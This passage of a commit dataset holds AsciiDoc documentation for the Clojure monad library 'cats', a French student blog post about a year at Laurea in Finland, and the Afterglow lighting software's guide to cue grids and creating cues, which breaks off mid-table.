error\nhandling with heap-based error handling. Instead of having an exception thrown and\nhaving to deal with it immediately in the same thread, it disconnects the error\nhandling and recovery.\n\n.Usage example of *try-on* macro.\n[source, Clojure]\n----\n(require '[cats.monad.exception :as exc])\n\n(exc\/try-on 1)\n;; => #<Success [1]>\n\n(exc\/try-on (+ 1 nil))\n;; => #<Failure [#<NullPointerException java.lang.NullPointerException>]>\n----\n\n_cats_ comes with other syntactic sugar macros: `try-or-else` that\nreturns a default value if a computation fails, and `try-or-recover` that lets\nyou handle the return value when executing a function with the exception as\nfirst parameter.\n\n\n.Usage example of `try-or-else` macro.\n[source, Clojure]\n----\n(exc\/try-or-else (+ 1 nil) 2)\n;; => #<Success [2]>\n----\n\n.Usage example of `try-or-recover` macro.\n[source, Clojure]\n----\n(exc\/try-or-recover (+ 1 nil)\n (fn [e]\n (cond\n (instance? NullPointerException e) 0\n :else 100)))\n;; => #<Success [0]>\n----\n\n\n=== State\n\nState monad in one of the special cases of monads most used in Haskell. It has different\npurposes including: lazy computation, composition, and maintaining state without explicit state.\n\nThe de-facto monadic type of the state monad is a plain function. Function represents a computation\nas is (without executing it). Obviously, a function should have some special characteristics to work\nin monad state composition.\n\n.Valid function for valid state monad\n[source, Clojure]\n----\n(fn [state]\n \"Takes state as argument and return a vector\n with first argument with procesed value and\n second argument the transformed new state.\"\n (let [newvalue (first state)\n newstate (next state)]\n [newvalue newstate]))\n----\n\nYou just saw an example of the low-level primitive state monad. For basic usage\nyou do not need to build your own functions, just use some helpers that _cats_ provides.\n\nLet's look at one example before explaining the details:\n\n.Lazy composition of computations\n[source, Clojure]\n----\n(m\/mlet [state (m\/get-state)\n _ (m\/put-state (next state))]\n (return (first state)))\n;;=> #<State cats.monad.state.State@2eebabb6>\n----\n\nAt the moment of evaluation in the previous expression, anything that we have defined\nis executed. But instead of returning the unadorned final value of the computation,\na strange\/unknown object is returned of type *State*.\n\nState is simply a wrapper for Clojure functions, nothing more.\n\nNow, it's time to execute the composed computation. For this we can use one of the following\nfunctions exposed by _cats_: `run-state`, `eval-state` and `exec-state`.\n\n- `run-state` function executes the composed computation and returns both the value and the\n result state.\n- `eval-state` function executes the composed computation and returns the resulting value\n discarding the state.\n- `exec-state` function executes the composed computation and return only the resulting\n state, ignoring the resulting value.\n\n.This is what happens when we execute these three functions over previously generated `State` instance\n[source, Clojure]\n----\n(m\/run-state s [1 2 3])\n;;=> #<Pair [1 (2 3)]>\n(m\/eval-state s [1 2 3])\n;;=> 1\n(m\/exec-state s [1 2 3])\n;;=> (2 3)\n----\n\nNOTE: the pair instance returned by `run-state` function works like any other seq in Clojure, with\nthe difference that pairs can only have two slots.\n\nThis is a very basic example of the state monad, it has a lot of use cases and explaining all them\nseems out of the scope of this document.\n\nHowever, if you have better examples to explain the state monad, documentation for another monad or\nany other contribution is always welcome.\n\n\n=== Channel\n\nIn asynchronous environments with clojure and clojurescript we tend to use core.async, because it\nis a very powerfull abstraction.\n\nIt would be awesome to be able to work with channel as a monadic type, and combine it with error\nmonads for short-circuiting async computations that may fail.\n\nLet's start using channel as a functor:\n[source, clojure]\n----\n(require '[cljs.core.async :refer [chan put! <!!]])\n(require '[cats.monad.channel :as channel])\n\n;; Declare arbitrary channel with initial value\n(def mychan (channel\/with-value 2))\n\n;; Use channel as a functor\n(<!! (m\/fmap inc mychan))\n;; => 3\n----\n\nThe channel type also fulfills the monad abstraction, let see it in action:\n\n[source, clojure]\n----\n(def result (m\/mlet [a (channel\/with-value 2)\n b (channel\/with-value 3)]\n (m\/return (+ a b))))\n(<!! result)\n;; => 5\n----\n\nBut the best of all is coming: combine the channel monad with error monads. It allows to build very concise\nand simple asynchronous APIs. Let see how you can use it your application:\n\n[source, clojure]\n----\n(require '[cats.monad.either :as either])\n\n;; Declare a monad transformer\n(def either-chan-m\n (either\/either-transformer channel\/channel-monad))\n\n;; A success example\n(<!! (m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/right 2))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Right [5]>\n----\n\nAs you can see, the code looks very similar to the previos example, with the exception that\nthe value in a channel is not a simple plain value, is an either instance.\n\nLet's see what happens if some computation fails in the mlet composition:\n\n[source, clojure]\n----\n(<!! (m\/with-monad either-chan-m\n (m\/mlet [a (channel\/with-value (either\/left \"Some error\"))\n b (channel\/with-value (either\/right 3))]\n (m\/return (+ a b)))))\n;; => #<Left [Some error]>\n----\n\nThe result is the expected short-circuiting left, without unexpected nullpointer exceptions\nor similar issues.\n\nWith this compositional power, you can model your asynchronous API with a complete\nerror handling using any error monad (in this case Either).\n\n\n=== Reader\n\nTODO\n\n\n=== Writer\n\nTODO\n\n\n=== Continuation\n\nTODO\n\n\n=== Vector\n\nTODO\n\n\n== FAQ\n\n=== What are the difference with other existing libraries?\n\nThis is an incomplete list of differences with other existing libraries:\n\n- The official monads library `algo.monads` is very good, but its approach for modeling\n is slighty limited (e.g. you always need to specify what monad you want use instead of\n relying on the type). And obviously because it only has monads.\n- Fluokitten is the best library that we found, but the future of it is uncertain. One big\n difference with fluokitten is that `cats` doesn't aim to extend every Clojure type\n with monadic protocols, for the obvious reason that monad; functor and applicative represents\n context\/wrapper types and it doesn't make sense to implement Functor protocol for `java.lang.String`.\n- `bwo\/monads` is the last monads library. It is completely undocumented and its implementation\n has much unnecesary complexity.\n\n\n=== What Clojure types implements some of the Category Theory abstractions?\n\nIn contrast to other similar libraries in Clojure, _cats_ doesn't intend to extend Clojure types\nthat don't act like containers. For example, Clojure keywords are values but can not be containers so\nthey should not extend any of the previously explained protocols.\n\n\n.Summary of Clojure types and implemented protocols\n[options=\"header\"]\n|=============================================================\n| Name | Implemented protocols\n| vector | Functor, Applicative, Monad, MonadZero, MonadPlus\n| hash-set | Functor, Applicative, Monad, MonadZero, MonadPlus\n| list | Functor, Applicative, Monad, MonadZero, MonadPlus\n|=============================================================\n\n\n== How to Contribute?\n\n=== Philosophy\n\nFive most important rules:\n\n- Beautiful is better than ugly.\n- Explicit is better than implicit.\n- Simple is better than complex.\n- Complex is better than complicated.\n- Readability counts.\n\nAll contributions to _cats_ should keep these important rules in mind.\n\n\n=== Procedure\n\n_cats_ does not have many restrictions for contributions. Just follow these\nsteps depending on the situation:\n\n*Bugfix*:\n\n- Fork the GitHub repo.\n- Fix a bug\/typo on a new branch.\n- Make a pull-request to master.\n\n*New feature*:\n\n- Open new issue with the new feature proposal.\n- If it is accepted, follow the same steps as \"bugfix\".\n\n\n=== License\n\n[source,text]\n----\nCopyright (c) 2014-2015 Andrey Antukh <niwi@niwi.be>\nCopyright (c) 2014-2015 Alejandro G\u00f3mez\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and\/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n----\n","returncode":0,"stderr":"","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9f1f0012a9b5137abfdceeb2401e30af558f7561","subject":"Update 2015-02-25-Tervetuloa.adoc","message":"Update 2015-02-25-Tervetuloa.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-02-25-Tervetuloa.adoc","new_file":"_posts\/2015-02-25-Tervetuloa.adoc","new_contents":"= Tervetuloa !\n\n:hp-tags: Pr\u00e9sentation, Introduction, Finlande, Laurea\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/helsinki-background.jpg\n\n\nNous sommes cinq \u00e9tudiants d'Epitech - \u00e9cole d'expertise informatique fran\u00e7aise - et nous passerons notre quatri\u00e8me ann\u00e9e (2015\/2016) en Finlande ! Plus pr\u00e9cis\u00e9ment, nous avons \u00e9t\u00e9 accept\u00e9 \u00e0 l'universit\u00e9 de Laurea, \u00e0 Espoo, pr\u00e8s d'Helsinki. +\nC'est pour cette raison que nous avons aujourd'hui d\u00e9cid\u00e9 de faire un blog, dans un premier temps pour partager nos ressources sur la Finlande, sa culture etc., et plus tard pour raconter notre exp\u00e9rience, que ce soit au niveau des cours que nous suivrons ou de la vie sur place.\n\nLes \u00e9tudiants ayant \u00e9t\u00e9 re\u00e7us \u00e0 Laurea et tenant ce blog sont : J\u00e9r\u00f4me CAMPEAUX (Paris), Martin DONADIEU (Montpellier), link:https:\/\/github.com\/ArmandDu[Armand DUPUIS] (Strasbourg), Beno\u00eet DURAND (Paris) et Coline MARION (Paris).\n\nBienvenue sur notre blog, nous esp\u00e9rons que vous l'appr\u00e9cierez et qu'il vous sera utile !","old_contents":"= Tervetuloa !\n\n:hp-tags: Pr\u00e9sentation, Introduction, Finlande, Laurea\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/helsinki-background.jpg\n:published_at: 2015-02-25\n\nNous sommes cinq \u00e9tudiants d'Epitech - \u00e9cole d'expertise informatique fran\u00e7aise - et nous passerons notre quatri\u00e8me ann\u00e9e (2015\/2016) en Finlande ! Plus pr\u00e9cis\u00e9ment, nous avons \u00e9t\u00e9 accept\u00e9 \u00e0 l'universit\u00e9 de Laurea, \u00e0 Espoo, pr\u00e8s d'Helsinki. +\nC'est pour cette raison que nous avons aujourd'hui d\u00e9cid\u00e9 de faire un blog, dans un premier temps pour partager nos ressources sur la Finlande, sa culture etc., et plus tard pour raconter notre exp\u00e9rience, que ce soit au niveau des cours que nous suivrons ou de la vie sur place.\n\nLes \u00e9tudiants ayant \u00e9t\u00e9 re\u00e7us \u00e0 Laurea et tenant ce blog sont : J\u00e9r\u00f4me CAMPEAUX (Paris), Martin DONADIEU (Montpellier), link:https:\/\/github.com\/ArmandDu[Armand DUPUIS] (Strasbourg), Beno\u00eet DURAND (Paris) et Coline MARION (Paris).\n\nBienvenue sur notre blog, nous esp\u00e9rons que vous l'appr\u00e9cierez et qu'il vous sera utile !","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"e8d862ec8dcb559b478c04f9eab005e579b2113c","subject":"Fix heading levels, add TOC.","message":"Fix heading levels, add TOC.\n","repos":"brunchboy\/afterglow,ryfow\/afterglow,ryfow\/afterglow,brunchboy\/afterglow,dandaka\/afterglow,brunchboy\/afterglow,dandaka\/afterglow","old_file":"doc\/cues.adoc","new_file":"doc\/cues.adoc","new_contents":"= Cues\nJames Elliott <james@deepsymmetry.org>\n:icons: font\n:toc:\n:toc-placement: preamble\n\n\/\/ Set up support for relative links on GitHub; add more conditions\n\/\/ if you need to support other environments and extensions.\nifdef::env-github[:outfilesuffix: .adoc]\n\nCues are designed to support creating user interfaces for controlling\neffects. They provide a convenient way to organize, identify, trigger,\nadjust, and monitor effects. Each\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html[show] in\nAfterglow maintains a cue grid, which can be viewed and interacted\nwith through the <<README#the-embedded-web-interface,embedded web\ninterface>> and MIDI controller mapping implementations which can be\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-register-grid-controller[registered\nas grid controllers], like the <<mapping_sync#using-ableton-push,Ableton Push>>.\n\n== The Cue Grid\n\nThe cue grid is a two dimensional arrangement of cues, where the\nbottom left corner is assigned coordinates `(0, 0)`. X coordinates\nincrease from left to right, and Y coordinates increase from bottom to\ntop. The web interface and registered grid controllers display 64 cues\nat a time in an 8×8 grid, and can be scrolled around that grid.\nThe user can configue (“link”) the web interface to track\nthe scroll position of a registered grid controller. When that is\ndone, scrolling either interface will cause the other to scroll in the\nsame way, so the browser window can act as documentation to help the\nuser learn the cue names associated with each available cue pad on the\ncontroller.\n\nimage::assets\/ShowGrid.png[Web interface]\n\nIn addition to names, cues can be assigned colors in the grid, and the\nweb interface will honor those colors, as will the physical grid\ncontrollers, within the limits of their capabilities. To provide\nfeedback about cue activation, a lightened version of the cue color is\ndisplayed for cues which are currently active. And to help inform the\nuser about cue compatibility, any cues which are assigned the same\neffect keyword, meaning they will terminate each other when launched,\nwill be displayed in a darkened color if an effect with that keyword\nis currently running. Examples of both of these can be seen in the\nfirst column of cues above, in which the “All Dimmers” cue\nis active and displaying a lightened version of the yellow color\nassigned to it, and the two cues above it, “All Saw Down\nBeat” and “All Saw Up 2 Beat” use the same keyword\nand color, and so are displaying a darkened version of the yellow\ncolor. This is a useful technique for building easy-to-learn cue\ngrids. The same cues are shown on the Ableton Push below, so you can\nsee how the color relationships help with learning the cue names.\n\nimage::assets\/AbletonInterface.jpg[Ableton Push interface]\n\nTo trigger a cue, simply press the corresponding pad on a physical\ninterface, or click within the grid cell in the web interface. The\neffect associated with the cue will be created and added to the show,\nand the grid cell will be lightened to indicate that the cue's\neffect is running. If the cue ends itself after a period, the grid\ninterface will be updated to reflect that as well.\n\nTo end a cue's effect before it would naturally end (or because\nit is open-ended and does not end until asked to), simply press the\npad corresponding to the running cue (or, again, click the grid cell\nin the web interface). The effect will be asked to end. Some effects\nend instantly, which will be refleced by the cue grid cell returning\nto its normal color. Some effects have a delayed ending, so they can\nfade out, or finish some musically relevant sequence. If this is\nhappening, the grid cell will blink while the effect ends, and then\nstay at its normal color once the effect finishes ending. If you want\nthe effect to end immediately you can press the pad one more time\nwhile the effect is performing its gradual ending, and it will be\nkilled at that point, regardless of how much longer it was planning to\nrun.\n\n[[held-flag]]Cues can also be created which run only as long as the\ncorresponding controller pad is held down (this is done by passing a\ntrue value with the `:held` optional keyword argument when creating\nthe cue). This is often done for intense effects like strobes.\n\nCues can also offer pressure sensitivity on controllers which support\nthis (like the Ableton Push). For such cues, one or more variable used\nby the cue can be updated by the aftertouch pressure exerted by the\noperator as they hold down the pad. This can make for very expressive\neffects, as exemplified by the Sparkle cue set up early in the\nexamples namespace's\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction, and its\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[strobe]\ncues. Of course, this pressure sensitivity is not possible with the\nweb cue grid.\n\nThe interface for moving around the cue grid is the diamond of arrows\nat the bottom right of both the web interface and the Ableton Push. If\nthere are more cues available in a particular direction, that arrow is\nlit, otherwise it is dark. For the cues pictured above, the bottom\nleft corner of the cue grid is being displayed, and there are more\ncues above and to the right, so the up and right scroll arrows are\nlit. Pressing an arrow scrolls to the next set of eight rows or\ncolumns in that direction. (And if the web view is linked to a grid\ncontroller, pressing the arrow on either will scroll both. For\nphysical grid controllers which lack scroll buttons, linking them to\nthe web interface is the most practical way of scrolling them.)\n\nCues can also be triggered from simpler MIDI controllers (which\ndon't register as grid controllers) by explicitly mapping notes\nor control changes sent by the controller to cues within the grid\nusing\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping].\nRegardless of the mechanism by which a cue is triggered, the web\ninterface, a registered grid controller, or an explicitly mapped MIDI\nnote or control change, feedback will be sent to all interfaces so the\nstatus of the cue will be represented consistently on all of them. And\na cue triggered on one controller can be ended on any other controller\nby simply pressing the lit button or clicking the lit cell there.\n\nFor example, to be able to trigger the Sparkle cue, which the examples\nnamespace places at `(0, 7)` within the sample show cue grid, by\npressing the bottom leftmost button on my inexpensive Korg nanoKontrol\n2 MIDI controller, after using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.midi.html#var-identify-mapping[afterglow.midi\/identify-mapping]\nto determine that the button sends control-change messages for\ncontroller number `43`, I can simply evaluate:\n\n[source,clojure]\n----\n(show\/add-midi-control-to-cue-mapping \"nano\" 0 :control 43 0 7)\n----\n\nNow I can press the top-left pad on the Push, click the top left cell\nin the Web interface, or press that button on the nanoKontrol, and the\nSparkle cue lights up on all three interfaces, and the effect runs and\nsparkles the lights.\n\n[NOTE]\n====\n\nIn order to enable Afterglow to send feedback about cue status to the\nlights on the nanoKontrol I needed to use the Korg Kontrol Editor to\nset its LED Mode to _External_ (as shipped, they were in _Internal_\nmode, and lit themselves when held down). Most MIDI controllers are\nlikely to need similar configuration to work as feedback-capable cue\ncontrollers with Afterglow, but most I have seen do offer\nconfiguration tools to enable this kind of external control.\n\n====\n\n[[creating-cues]]\n== Creating Cues\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html[afterglow.effects.cues]\nnamespace provides functions for creating cues. Unsurprisingly, the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[cue]\nfunction creates a cue. At its most basic, you pass in two parameters,\n`show-key` which is the keyword that will be used to add the\ncue's effect to the show when the cue is triggered, ending any\nother effect running under that same keyword, and `effect`, which is a\nfunction that will be called when the cue is triggered, and whose\nresponsibility is to create and return the effect that the cue should\nadd to the show. This is done so that a fresh instance of the effect\nis used each time the cue is triggered, in case the effect is complex\nand maintains its own state. The effect creation function will be\npassed a map containing any <<cues#cue-variables,cue-specific variable bindings>>.\n\nNOTE: For the very common case of wanting to create a cue to activate\na fixture-specific _function_ (capability), and perhaps adjust the\nfunction's activation level while it runs, you can instead call the\nspecial-purpose `function-cue` described\n<<cues#creating-function-cues,below>>.\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created. Remember that you can also consult the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[API\ndocumentation] for another explanation of these functions, and for\nlinks to examine the source code, which is the most authoritative\nexplanation of how they work, and can offer inspiration for variations\nthat you might want to create yourself.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:short-name`\n|effect name\n\n|Sets the text to be displayed for the cue in the web cue grid, and in\nthe text display of the controller (if it has one) when the cue is\nrunning. If you don't supply a short name, the name of the\neffect created by the `effect` function is used, but that may be too\nlong or not informative enough.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:variables`\n|none\n\n|Specifies a sequence of show variable bindings that\ncan be used by the cue's effect. Each variable specification is a map,\nwhose content is described in the following table. These\nspecifications are used to create any necessary new variables, and a\nmap describing any cue-local variables is passed to the `effect`\nfunction when the cue is triggered, so they can be used as needed when\ncreating the cue's effect.\n\n|===\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.[[cue-variables]]Cue variable specification maps\n|===\n|Key\n|Default\n|Purpose\n\n|`:key`\n|_n\/a_\n\n|Identifies the variable that is being bound to the cue. This can\n either be a keyword, and refer to an existing show variable (set\n using\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-set-variable.21[afterglow.show\/set-variable!]),\n or a string, meaning that a new variable should be introduced for the\n cue. The actual name of this new variable will be assigned when the\n cue is activated. In order for the effect to be able to access the\n correct variable, a map is passed to the `effect` function that\n creates the cue's effect. Within this map, the keys are keywords\n created from the strings passed as `:key` values in the cue's\n variable specification maps, and the corresponding values are the\n keyword of the variable that was created for the cue to go with that\n key. An example of using such cue-local variables can be found in the\n source of the\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[make-strobe-cue]\n example, for the variable `level`. That cue also makes use of the\n independent show variable `:strobe-lightness` which is set by a\n separate `adjust-strobe` cue running the effect\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.fun.html#var-adjust-strobe[afterglow.fun\/adjust-strobe],\n forming an interesting demonstration of interacting cues.\n\n|`:start`\n|`nil`\n\n|Specifies the value to assign when creating the cue-local variable.\n Applies only when the value at `:key` is a string rather than a\n keyword, so a variable is being created just for the cue.\n\n|`:name`\n|variable name\n\n|Provides a name to identify the variable in the web interface and in\n the text area of physical controllers which provide a labeled\n interface for adjusting running effects, like the Ableton Push. If no\n name is supplied, the name of the value passed with `:key` is used;\n provide `:name` in cases where that would be insufficiently\n descriptive.\n\n|`:short-name`\n|none\n\n|If present, gives a shorter version of `:name` to be used in\n interfaces with limited space.\n\n|`:min`\n|`0`\n\n|Specifies the smallest value that the variable can be adjusted to, for\n interfaces which support adjustment of cue variables while the cue is\n running. If not supplied, the minimum value will be zero.\n\n|`:max`\n|`100`\n\n|Specifies the largest value that the variable can be adjusted to, for\n interfaces which support adjustment of cue variables while the cue is\n running. If not supplied, the maximum value will be one hundred.\n\n|`:type`\n|`:float`\n\n|Provides a hint for how the variable should be formatted in\n adjustment interfaces. Supported values are `:integer` and `:float`.\n Others may be added in the future. If not provided (or an\n unrecognized value is provided), the variable is assumed to hold\n floating-point values.\n\n|`:centered`\n|`false`\n\n|Requests that variable adjustment interfaces which draw a graphical\n representation of the current value within its range display this\n variable as a deviation from a central value, rather than something\n growing from the left, if they have such options.\n\n|`:resolution`\n|_varies_\n\n|Specifies the smallest amount by which the variable should be\n adjusted when the user is turning a continuous encoder knob. If not\n specified, the controller implementation gets to decide what to do.\n The recommended default resolution is no larger then 1\/256 of the\n range from `:min` to `:max`.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a true value, requests that the variable value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`:min`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the variable should be set to by MIDI aftertouch pressure. If\n not specified, the standard `:min` value is used.\n\n|`:aftertouch-max`\n|`:max`\n\n|If present (and `:aftertouch` is active), specifies the largest\n value the variable should be set to by MIDI aftertouch pressure. If\n not specified, the standard `:max` value is used.\n\n|===\n\n[[creating-function-cues]]\n== Creating Function Cues\n\nOften you want a cue to activate a specific feature of a fixture\n(often described as a _function_ in the fixture manual, and in the\nfixture definition within Afterglow, which can unfortunately get\nconfusing when we are talking about invoking Clojure functions). To\nmake it easy to work with such fixture capabilities, the\n`afterglow.effects.cues` namespace also offers the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[function-cue]\nfunction. It is quite similar to the `cue` function described\n<<cues#creating-cues,above>>, but it takes care of creating the effect\nfor you, given the function name you want to apply to a fixture or set\nof fixtures. You can even apply the function to fixtures from\ndifferent manufactures, regardless of whether they implement it on\ndifferent channels and with different value ranges. If it has been\nassigned the same function name (such as, for example, `:strobe`),\nAfterglow will find it in each fixture definition, and send the right\nvalues to each fixture.\n\nNOTE: Function cues are able to figure out how to do the right thing\nfor each fixture because they can scan the fixture definitions for\n<<fixture_definitions#function-specifications,Function Specifications>>\nmatching the keyword you gave when creating the cue. When you patch a\nfixture into a show, Afterglow indexes its function ranges in order to\nmake this efficient.\n\n`function-cue` also automatically creates a temporary cue-local\nvariable for <<mapping_sync#effect-control,adjusting>> the function\nlevel if the function is not fixed over its range. This makes it\nessentially a one-liner to create a button in your cue grid which\nactivates a function and then, if your controller supports it, lets\nyou tweak that function while is running. Examples include the Torrent\ngobo, focus, and prism cues created by\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues].\n\nMinimally, `function-cue` requires three parameters: `show-key` which\nis the keyword that will be used to add the cue's effect to the show\nwhen the cue is triggered, ending any other effect running under that\nsame keyword, `function`, which is the keyword identifying the\nfixture-specific capability that you want the cue to activate and\ncontrol, as defined in the fixture definition, and `fixtures`, which\nis the list of fixtures or heads that you want the cue to affect.\n(Only fixtures and heads which actually support the specified function\nwill be affected by the cue.)\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created, and are described below. See the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[API\ndocumentation] for more details.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `function-cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:effect-name`\n|function name\n\n|Sets the name to assign the effect created by the cue. If none is\n provided, the name of the `function` keyword is used.\n\n|`:short-name`\n|none\n\n|Can be used to provide a shorter name to be displayed for the cue in\nthe web cue grid, and in the text display of the controller (if it has\none) when the cue is running.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:level`\n|`0`\n\n|If provided, and the function supports a range of values with\n different meanings (such as a focus range, movement speed, or the\n like), sets the initial level to assign the function, and to the\n variable which will be introduced to allow the function value to be\n adjusted while the cue runs. Functions with no variable effect will\n ignore `:level`, and will have no cue-specific variables created for\n them. The level is treated as a percentage, where 0 is mapped to the\n lowest legal DMX value that activates the function, and 100 is mapped\n to the highest.\n\n|`:htp`\n|`false`\n\n|If supplied along with a true value, causes the effect that is\n created for this cue to operate with _highest-takes-precedence_ rules\n with respect to any other effect which has already assigned a value\n for this function. Otherwise, the effect will simply discard any\n previous assignments, replacing them with its own regardless of their\n value.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a 